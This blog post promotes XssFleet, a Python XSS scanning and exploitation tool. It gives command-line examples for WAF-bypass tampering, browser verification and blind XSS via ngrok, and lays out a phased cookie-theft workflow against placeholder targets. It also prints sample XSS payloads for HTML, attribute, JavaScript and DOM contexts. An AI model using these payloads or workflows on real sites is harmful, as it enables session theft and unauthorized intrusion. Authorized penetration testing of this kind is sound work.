XssFleet: Automated XSS Vulnerability Detection and Exploitation Tool
GitHub: https://github.com/jhli07/XssFleet
If you have ever run a web security scan and found yourself drowning in false positives from basic XSS detectors, you know the pain. Most tools either spray-and-pray with generic payloads or trip WAFs instantly. XssFleet is a different breed — a Python-based penetration testing tool that does not just detect XSS vulnerabilities, it helps you verify and exploit them in a controlled way.
I stumbled across this project on GitHub and was genuinely impressed by its scope. Let me break it down for you.
What is XssFleet?
XssFleet is a professional-grade, automated XSS (Cross-Site Scripting) vulnerability penetration testing tool written in Python. It is designed for security researchers and penetration testers who need more than a basic scanner.
Quick Stats:
- Language: Python
- License: MIT
- Created: May 2, 2026
- Repository: https://github.com/jhli07/XssFleet
Supported XSS Types
This is where XssFleet stands out. It does not just handle one or two XSS types — it covers a wide range:
- Reflected XSS — User input is immediately returned by the server
- Stored XSS — Malicious script is permanently stored on the target server
- DOM-based XSS — Vulnerability exists entirely on the client-side
- Blind XSS — Payload executes somewhere else (e.g., admin panel)
- SVG XSS — Exploits SVG XML parsing vulnerabilities
- JSONP XSS — Exploits JSONP callback endpoints
- AngularJS XSS — Targets AngularJS template injection
Installation
# Clone the repository
git clone https://github.com/jhli07/XssFleet.git
cd XssFleet
# Install dependencies
pip install -r requirements.txt
# Run
python xssfleet/xssfleet.py --help
Core Features
1. Intelligent Payload Generation
XssFleet generates context-aware payloads instead of using a one-size-fits-all wordlist. It automatically detects the vulnerability context (HTML tags, attributes, JavaScript, DOM) and crafts appropriate payloads.
2. WAF Bypass with Tamper Scripts
Got a WAF blocking your scans? XssFleet has built-in tamper scripts:
python xssfleet/xssfleet.py -u "http://waf-protected.com/search" --tamper=space2comment,base64encode
Available tamper scripts include:
-
space2comment— Replaces spaces with/* */comments -
base64encode— Base64 encodes the payload - And more...
3. Browser-Based Verification
False positives are the bane of automated scanners. XssFleet solves this with --verify mode, which uses browser automation to confirm whether a vulnerability is actually exploitable:
python xssfleet/xssfleet.py -u "http://target.com/search?q=test" --verify
4. Deep Scanning Mode
For comprehensive assessments, use --deep mode:
python xssfleet/xssfleet.py -u "http://target.com" --deep --verify -o results/
5. Exploitation Framework
This is where XssFleet goes beyond typical scanners. It has an exploitation mode (--exploit) that lets you:
- Steal Cookies — Capture session cookies from victims
- Keylogging — Log keystrokes on compromised pages
- Page Injection — Inject malicious content into vulnerable pages
- Phishing Simulation — Demonstrate real-world impact
6. Blind XSS Support with ngrok
Testing for blind XSS (where your payload executes in an admin panel or backend you never see) is tricky. XssFleet integrates with ngrok to bridge the gap:
# Set up ngrok (requires ngrok installation and authtoken)
ngrok http 8080
# In another terminal, run XssFleet in exploitation mode
python xssfleet/xssfleet.py --exploit
7. POST Request Testing
Not all XSS vulnerabilities live in GET parameters:
python xssfleet/xssfleet.py -u "http://example.com/login" --method POST --data "username=test&password=123"
8. Hidden Parameter Discovery
Test parameters you would not normally think to check:
python xssfleet/xssfleet.py -u "http://example.com/page" -p t_sort
9. Report Generation
Generate detailed reports in multiple formats:
python xssfleet/xssfleet.py -u "http://target.com" --report-format all -o report/
Real-World Usage Examples
Example 1: Basic Scan
python xssfleet/xssfleet.py -u "http://vulnerable.com/search?q=test"
Example 2: Deep Scan with Verification
python xssfleet/xssfleet.py -u "http://target.com" --deep --verify
Example 3: Bypassing WAF
python xssfleet/xssfleet.py -u "http://waf-protected.com/search" --tamper=space2comment,base64encode
Example 4: Cookie Theft Attack
# Phase 1: Discover vulnerability
python xssfleet/xssfleet.py -u "http://vulnerable.com/search?q=test"
# Phase 2: Launch exploitation
python xssfleet/xssfleet.py --exploit
# Phase 3: Select "steal_cookie" module
# Phase 4: Inject generated payload into the vulnerability point
# Phase 5: Wait for target to visit, then view captured cookies
Example 5: Complete Penetration Testing Workflow
# Phase 1: Discover
python xssfleet/xssfleet.py -u "http://target.com" --deep --verify -o phase1/
# Phase 2: Exploit
python xssfleet/xssfleet.py --exploit
# Phase 3: Report
python xssfleet/xssfleet.py -u "http://target.com" --report-format all -o final_report/
Understanding XSS Contexts
XssFleet automatically handles different vulnerability contexts:
HTML Tag Context
Input appears directly between HTML tags like: <div>USER INPUT</div>
Payload: <script>alert(1)</script>
HTML Attribute Context
Input becomes an attribute value like: <input value="USER INPUT">
Payload: "><script>alert(1)</script>
JavaScript Context
Input lands inside a script block like: <script>var name = "USER INPUT";</script>
Payload: ";alert(1);"
DOM-based Context
Input processed by JavaScript DOM manipulation like: document.write(location.hash)
Payload: #<img src=x onerror=alert(1)>
Ethical Disclaimer
XssFleet is a security research tool. Only use it on systems you have explicit written authorization to test. Unauthorized scanning/testing is illegal and unethical. The maintainers assume no liability for misuse.
How Does It Compare?
| Feature | XssFleet | XSStrike | DalFox |
|---|---|---|---|
| WAF Bypass | Yes | Yes | Yes |
| Exploitation Mode | Yes | No | No |
| Blind XSS | Yes | Limited | Yes |
| Browser Verification | Yes | No | No |
| Cookie Theft | Yes | No | No |
| DOM XSS | Yes | Yes | Yes |
| ngrok Integration | Yes | No | No |
Final Thoughts
XssFleet is a serious tool for serious security work. While tools like XSStrike and DalFox are excellent at detection, XssFleet goes the extra mile with its exploitation framework. The ability to verify vulnerabilities with browser automation, bypass WAFs, and actually demonstrate impact with cookie theft and similar attacks makes it a valuable addition to any penetration tester toolkit.
If you are doing authorized security testing, give it a spin:
👉 https://github.com/jhli07/XssFleet
Have you tried XssFleet? Share your experience in the comments!
Top comments (0)